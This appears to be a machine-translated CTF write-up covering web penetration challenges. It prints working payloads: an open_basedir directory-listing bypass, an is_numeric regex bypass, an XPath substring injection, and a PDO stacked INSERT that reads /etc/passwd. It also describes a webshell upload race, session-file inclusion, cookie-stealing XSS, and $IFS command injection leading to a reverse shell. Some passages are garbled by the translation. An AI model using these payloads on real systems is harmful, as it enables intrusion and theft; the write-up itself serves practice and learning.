To hacker: you are so awesome, why don't you come and play this CTF

Keywords: Programmer Cyber Security penetration test Information Security

The path of painful penetration

0x00 Preface

The CTF was very sour this time. There were 7 WEB penetration topics, which was also the beginning of pain. Good audit, why add so many high thresholds.

0x01 Pentest-homework-200

Open the complete page, that is, log in to the registration page. Name, age, upload pictures.

After successful login, a picture is displayed. There is also a link to homework.

After clicking the home link, there is a web address of the wrapped page.

It can be determined that this is a brain hole with a file containing a vulnerability. Try uploading a Trojan horse image to include it now.

Inevitably, it includes failure.

Read the source code to see what's wrong with the upload function.

Read successfully. Then download all the read source code.

Pass audit code

$filename = $_FILES\['uploaded'\]\['name'\];
$filetype = $_FILES\['uploaded'\]\['type'\];
$filesize = $_FILES\['uploaded'\]\['size'\];
$tmpname = $\_FILES\['uploaded'\]\['tmp\_name'\];
$uploaddir = './upload/';
$target_path = $uploaddir.basename($filename);
$fileext = substr(strrchr($filename,"."),1);if(($fileext == 'gif')&&($filetype == "image/gif")){
    {        if(move\_uploaded\_file($tmpname,$target_path))
    $im =imagecreatefromgif($target_path);
    $newfilename = strval(rand()).".gif";
    $newimagepath = $uploaddir.$newfilename;
}else if(($fileext == 'jpg')&&($filetype == "image/jpeg")){

It's really interesting. The uploaded pictures have been processed by functions such as imagecreate fromgif.

But that's not the point. The point is the previous move_uploaded_file( t m p n a m e , tmpname, tmpname,target_path)

Those familiar with php code should know, but they have successfully uploaded pictures.

Network security CTF resource package

After successful upload, process and delete the source file unlink($target_path);.

Therefore, the topic is time competition, network speed and character.

Upload pictures of writing shell scripts


brup multithreaded access

If you have good character, you will succeed soon.

Later, I found that the written shell disappeared inexplicably. It was visually observed that someone stirred shit, and then I wrote / tmp.2333333

webshell was uploaded successfully, but it was found that many functions were castrated

disable\_functions= passthru,exec,phpinfo,system,chroot,scandir,chgrp,chown,shell\_exec,proc\_open,proc\_get\_status,popen,ini\_alter,ini\_restore,dl,openlog,syslog,readlink,symlink,popepassthru,stream\_socket\_server,pcntl\_exec

Then use PHP to bypass the open_basedir column directory and the black technology column directory.

virink=printf('<b>open\_basedir : %s </b><br />', ini\_get('open\_basedir'));$file\_list = array();$it = new DirectoryIterator("glob:home/wwwroot/default/web/*");foreach($it as $f) {    $file\_list\[\] = $f->\_\_toString();}$it = new DirectoryIterator("glob:///.*");foreach($it as $f) {    $file\_list\[\] = $f->\_\_toString();}sort($file\_list);foreach($file\_list as $f){echo "{$f}<br/>";}

Then read the flag

virink=echo file\_get\_contents('/home/wwwroot/default/web/4ff692fb12aa996e27f0a108bfc386c2');


0x02 Pentest-sycshell-200

Right click to view the source code

<!-- Internal system data: -->

Change Hosts, and then use the domain name to access.

Then open the source code, decrypt the jsfuck code, and get


Code audit, including.

Source code:

    $pass = @$_GET\['pass'\];
    $a = "syclover";

    strlen($pass) > 15 ? die("Don't Hack me!") : "";    if(!is\_numeric($pass) || preg\_match('/0(x)?|-|\\+|\\s|^(\\.|\\d).*$/i',$pass)){        die('error');
    }    if($pass == 1 &&  $a\[$pass\] === "s"){
        $file = isset($\_GET\['f'\]) ? $\_GET\['f'\].'.php' : 'index.php';
        @include $file;

There's a brain hole!!!!! It's version limited.

According to the prompt: sycshell_tip audit, take a good look at the underlying code of PHP. In addition, it is convenient for you to

First, you can get PHP version 5.3.29.

Version vulnerability,% 0b(\v) can bypass regular \ s


php underlying source code

while (\*str == ' ' || \*str == '\\t' || \*str == '\\n' || \*str == '\\r' || \*str == '\\v' || \*str == '\\f') {

Another brain hole in this topic is phpinfo()+Lfi

Then there's the explosion, the, 2333

$pass bypasses this brain hole, which is similar to a problem of phithon cattle

Question 3: PHP type and logic + fuzz y and the _0x03 function feature of source code audit lead to bypassing the _part.

0x03 Pentest-DrugMarket1-300

Drug Market:

At the beginning, it was a brain hole, pseudo 404 Not Found page. I once suffered losses in this regard, and then silently looked at the source code and clicked on the hidden links.

Click order to submit data, and then there is no other function. xss may exist.

I continued to look at the source code and found a link.

Click order to submit data, and then there is no other function. xss may exist.

I continued to look at the source code and found a link.

Open the page and jump directly to

Obviously, a file contains a vulnerability. After looking around, there is no place to upload.

Then study the page function. After the customer logs in and fills in the user name and contact information casually, it is found that there is a session, and the user name and contact information are not filtered.

The preliminary judgment is that it contains session. It habitually contains / TMP / sessions_xxxxxxxxx. It is found that it does not exist. It is absolutely forced to change the place.

Then, to find the storage address of the session, you must first read the apache configuration file.


    ServerAdmin Syclover
    DocumentRoot /var/www/html
        <Directory "/var/www/html">
    AssignUserId apache apache
    php\_value\_path "/var/lib/php/session"</VirtualHost>
    ServerAdmin Syclover
    DocumentRoot /var/www/webhosts/www
        <Directory "/var/www/webhosts/www">
    AssignUserId www www
    php\_value\_path "/var/lib/php/session_www"</VirtualHost>
    ServerAdmin Syclover
    DocumentRoot /var/www/webhosts/drug
        <Directory "/var/www/webhosts/drug">
    AssignUserId drug drug
    php\_value\_path "/var/lib/php/session_drug"</VirtualHost>
    ServerAdmin Syclover
    DocumentRoot /var/www/webhosts/msgboard
        <Directory "/var/www/webhosts/msgboard">
    AssignUserId msgboard msgboard
    php\_value\_path "/var/lib/php/session_msgboard"</VirtualHost>

Smoothly know that the storage address of the session is / var/lib/php/session_msgboard

Username or Contact write\_msgboard/sess\_rb2rbfrie8rku2n81dq52vghp0

Then there is further information gathering




Other sites have no access rights. Silently read the source code of this site and get the database connection information.

Because this topic has been by FB, silently collect the information of predecessors. / tmp directory is my favorite... 23333

After reading a lot of useless things, I also got some useful things, such as the root password of mysql.23333

At that time, I had a brain attack and didn't save it well. After / tmp was inexplicably emptied, I couldn't find the relevant information of mysql database.

The thought is interrupted, and I always don't know how to execute the command.

Repeated research tips

This is a penetration problem, so please don't be limited to your current Shell and find a way to penetrate the drug site. In order to make the problem closer to the real environment, the firewall rules are more strict. Finally, I went back to XSS. Because I have seen the drug database and there is no administrator user table.

orderX comes and goes without effect. Then, when prompted by the little partner, X enters the adminconfig and successfully obtains the cookie!

After entering the administrator page, I found that there is a function of downloading pictures. My server listens to a port, and the server accesses my server, but there is no result. I still listen to port 80 when prompted by my partner. I found that prompt 2 is this brain hole.

Then you receive a wget request.

Visually, there is a command execution vulnerability.

Black Technology: $IFS instead of spaces

Upload a bounce py script


Then execute the command


Successfully get a bash shell.

Finally, find flag1.txt in / home/drug


0x04 Pentest-ETO-200

This is the first topic to be released, but it was tossed out at the end.

Simply try, there is injection.

Then, all kinds of injection failed.

The official tips are wonderful:

There's no need to try to blow up the ETO. In addition, hint is always there

I didn't find out where hint was from beginning to end.

It is found after the injection is completed that when an error is reported, a hint: / / user[id=1] is returned in the response header

The questioner's brain hole is absolutely forced to give 101 points, out of 100. More than one point is deep fatherly love.

At the prompt of my partner, I knew that this was an xpath injection.

Quotes are filtered, but the official tip 2 says make good use of existing characters.

Note: the characters in the password exist in username, email and role. It's ok to use the substring() function to judge character by character and substring(//user\[1\]/username,1,1)=substring(//user\[1\]/password,1,1)

Blow up another wave with your artifact Burp.

Finally, run out the 32-bit password: Ywj@4791.d_gToWDmceu.Eali0s2yarn

You can get the Flag after logging in


0x05 pentest hackme 300 unsuccessful

Tuotuo can't do it, or injection. Injection has always been my weakness. Orz

According to official tips

1. Website developers often read memos. 2. Try to get the administrator password. 3. Pay attention to the database connection mode. 4.XSS

And tips for small partners: PDO injection.

Baidu gets: PDO database connection, which can be injected by insert.

Toss around and make a look.;/*!50000insert*//*!50000into*/beiwanglu(id,time,event)/*!50000values*/(9,'virink',/*!50000select*/(/*!50000hex*/(/*!50000load_file*/(0x2F6574632F706173737764))));%23

Successfully X to the administrator's COOKIE...

Then try to get the administrator password according to the prompt. You can probably know that the next step may be to hijack the form and get the administrator password.

However, I won't.

XSS is more difficult than SQL injection ~~Orz

0x06 write last

Finally, the CTF was ended with 910 points of 0x01-0x04 + 10 points.

The brain hole is still not big enough and has too little experience. And stupid. Many key places and non key places have fallen into thinking misunderstandings. Without the tips of small partners, I guess I can get a sign in score of 10 points.

Posted by ntjang on Wed, 27 Oct 2021 23:06:31 -0700